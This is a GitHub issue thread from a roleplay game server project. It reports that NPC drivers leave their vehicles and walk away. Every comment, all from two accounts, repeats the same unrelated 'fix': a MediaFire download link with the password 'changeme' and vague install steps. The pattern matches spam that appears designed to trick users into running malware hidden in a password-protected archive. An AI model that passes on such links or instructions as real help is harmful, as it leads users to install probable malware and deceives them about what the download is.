### ISSUE TITLE
NPC's (Locals) - Abandoning Vehicles

### ISSUE THREAD

**Issue by urban-z** [LADOJRP/server#590]
Locals get out of there cars and just walk away, its really bad in county. If you drive down Joshua there will be tons of abandon vehicles, idk whats causing it they just hop out.

 This issue was submitted by thestee1e via LADOJRP Main Discord @ https://discord.com/channels/714606988675252244/1158172795839184978/1277826266535428116

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
